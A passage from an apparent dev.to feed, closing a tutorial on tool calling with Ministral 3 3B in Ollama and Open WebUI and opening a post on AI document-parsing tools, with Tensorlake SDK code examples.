  &lt;/span&gt;&lt;span class="nl"&gt;"x-api-key"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YOUR_COMPOSIO_API_KEY"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once that's done, click on &lt;strong&gt;Verify Connection&lt;/strong&gt;, and if everything went well, you should see "Connection Successful." That's pretty much all you need to do to use local and remote tools with the Ministral 3 3B model using Ollama.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffjwmz1wt6k1t1l3zzn77.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffjwmz1wt6k1t1l3zzn77.png" alt="Composio connection successful Ollama WebUI"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The steps here are going to be pretty much the same for any other models that support tool calling.&lt;/p&gt;

&lt;p&gt;Here's an example of the model returning a response after doing tool calls:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsojydiu22ulqu11rdj3r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsojydiu22ulqu11rdj3r.png" alt="Ministral 3 3B tool call response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; The model might take quite some time to answer the question and perform tool calls, and that pretty much depends on your system as well.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you feel something is not working as expected, you can always view logs of your Ollama WebUI.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker logs &lt;span class="nt"&gt;-f&lt;/span&gt; open-webui
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzl6ei4t20g0n5chd2z0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzl6ei4t20g0n5chd2z0.png" alt="Docker log for a container"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Next Steps
&lt;/h2&gt;

&lt;p&gt;This entire demo was done using Ollama and Ollama WebUI. See if you can get it working with vLLM and Ollama WebUI. The steps are going to be quite similar.&lt;/p&gt;

&lt;p&gt;Just follow the docs for vLLM installation based on your system, and follow the &lt;a href="https://docs.vllm.ai/en/latest/getting_started/installation/" rel="noopener noreferrer"&gt;guide&lt;/a&gt; which should get you going.&lt;/p&gt;

&lt;p&gt;Let me know if you are able to make it work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;That's it. We just ran a lightweight, quantized Ministral 3 3B model in Ollama, wrapped it with Open WebUI, and showed it can perform real tool calling, both with small local Python tools and remote MCP tools via Composio.&lt;/p&gt;

&lt;p&gt;You now have a simple local setup where the model can do more than just chat. The best part is, the steps won't change for other models, and you can quickly have your own local model that's entirely yours.&lt;/p&gt;

&lt;p&gt;Now, try adding more toolkits and models (if your system can handle it) and just experiment. You already have a clear understanding of Ministral 3 3B and running models locally with Ollama. Apply it to your actual work, and you'll thank me later.&lt;/p&gt;

&lt;p&gt;Well, that's all for now! I will see you in the next one. 🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hkkflgfwji3batcz86b.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hkkflgfwji3batcz86b.gif" alt="Peace out GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mcp</category>
      <category>productivity</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>✌️5 AI Document Parsing Tools That Actually Work 🚀🔥</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Fri, 12 Dec 2025 12:35:04 +0000</pubDate>
      <link>https://forem.com/shricodev/5-ai-document-parsing-tools-that-actually-work-db6</link>
      <guid>https://forem.com/shricodev/5-ai-document-parsing-tools-that-actually-work-db6</guid>
      <description>&lt;p&gt;Working with real world documents is still pain. PDFs, invoices, random exports from legacy tools. Half the work is just getting them into a clean, structured format your models can use. 😕&lt;/p&gt;

&lt;p&gt;This post is about that first step. The one that usually gets ignored in demos and tutorials. Parsing and structuring the documents.&lt;/p&gt;

&lt;p&gt;The tools here handle OCR, layout, tables, forms and file format so you can focus on the logic around them.&lt;/p&gt;

&lt;p&gt;I am walking through a few I actually like using, with short code snippets you can drop straight into your own projects.&lt;/p&gt;

&lt;p&gt;So, let's begin. 🚀&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F66ivyn1gsm2s1393lclg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F66ivyn1gsm2s1393lclg.gif" alt="Swag Man"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://www.tensorlake.ai/" rel="noopener noreferrer"&gt;1. Tensorlake&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Document Ingestion API plus a serverless runtime for agentic data workflows&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtg78vd8vjz7gcvrlekk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtg78vd8vjz7gcvrlekk.png" alt="Tensorlake - Document Ingestion API plus a serverless runtime for agentic data workflows"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tensorlake gives you two big things in one place:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A Document Ingestion API that turns messy files into clean markdown or structured JSON&lt;/li&gt;
&lt;li&gt;A serverless platform to run agentic workflows on top of that data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can send PDFs, Office files, images or raw text and get back well structured content with preserved layout. Long story short, you can treat it as a Document Ingestion API that handles PDFs, Office files, scans and images, then add agent style applications on top using their serverless runtime.&lt;/p&gt;

&lt;p&gt;So, instead of handling OCR and background jobs with retry logic, you get one single platform that parses, chunks, classifies and then feeds the results into the agent or tools.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;🤔 Is it for you?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you are building invoice extractors, contract analyzers, or any complex data ingestion or agents that need to actually read documents, Tensorlake sits right in the middle of your stack as the ingestion and workflow layer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi format parsing:&lt;/strong&gt; Parse PDFs, Office docs, spreadsheets, presentations, images and raw text to markdown or JSON.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout aware output:&lt;/strong&gt; Preserves tables, sections and reading order so your RAG or search stays aligned with the original document, which many other tools miss.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6fucbksmpbzth3uya9s.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6fucbksmpbzth3uya9s.webp" alt="Tensorlake preserving layout in the generated response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Schema based extraction:&lt;/strong&gt; Use JSON Schema or Pydantic models to pull out only the fields you care about.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agentic runtime:&lt;/strong&gt; Decorate Python functions, run them in sandboxes and let Tensorlake handle scaling, retries and state.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And many more...&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Now, let's go through a quick code example of some common use cases.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Code Example: From PDF to markdown
&lt;/h3&gt;

&lt;p&gt;First, install the SDK and use the DocumentAI client to upload a PDF, start a parse job and stream the markdown chunks once parsing is done.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;tensorlake
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, to extract the text from a PDF, you can do something like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.documentai&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DocumentAI&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ParseStatus&lt;/span&gt;

&lt;span class="n"&gt;doc_ai&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DocumentAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-api-key&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Upload and parse document
&lt;/span&gt;&lt;span class="n"&gt;file_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/path/to/document.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Start parsing
&lt;/span&gt;&lt;span class="n"&gt;parse_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Wait until parsing is complete
&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;wait_for_completion&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;parse_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;ParseStatus&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SUCCESSFUL&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Each chunk is a piece of clean markdown
&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;chunk&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chunks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chunk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the basic flow you would use in a backend job that takes uploaded PDFs and turns them into LLM friendly text for something like RAG or search.&lt;/p&gt;

&lt;p&gt;Once you have the chunks, you can push them straight into a vector store or a database.&lt;/p&gt;

&lt;p&gt;You can have more control over parsing, like using structured parsing, which you can find here: &lt;a href="https://github.com/tensorlakeai/tensorlake#structured-extraction" rel="noopener noreferrer"&gt;Structured Extraction&lt;/a&gt;. I leave it up to you to explore more about this.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Tiny agentic app on the Tensorlake runtime
&lt;/h3&gt;

&lt;p&gt;To run a small agentic app on top of Tensorlake, it's as simple as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;agents&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;agents.tool&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WebSearchTool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;function_tool&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.applications&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;function&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;run_local_application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;

&lt;span class="c1"&gt;# Container image with the dependencies the function needs
&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;base_image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_image&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;pip install openai openai-agents&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nd"&gt;@function_tool&lt;/span&gt;
&lt;span class="nd"&gt;@function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Gets the weather for a city&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;secrets&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_weather_tool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;agent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Weather Reporter&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;instructions&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Use web search to find current weather in the city&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;tools&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nc"&gt;WebSearchTool&lt;/span&gt;&lt;span class="p"&gt;()],&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run_sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;City: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;final_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="nd"&gt;@application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tags&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;example&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;use_case&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nd"&gt;@function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Creates a simple city guide&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;secrets&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;city_guide_app&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;agent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Guide Creator&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;instructions&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Make a friendly city guide that includes the current temperature&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;tools&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;get_weather_tool&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run_sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;City: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;final_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;city&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Paris&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Error: OPENAI_API_KEY is not set&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SystemExit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_local_application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_app&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;output&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



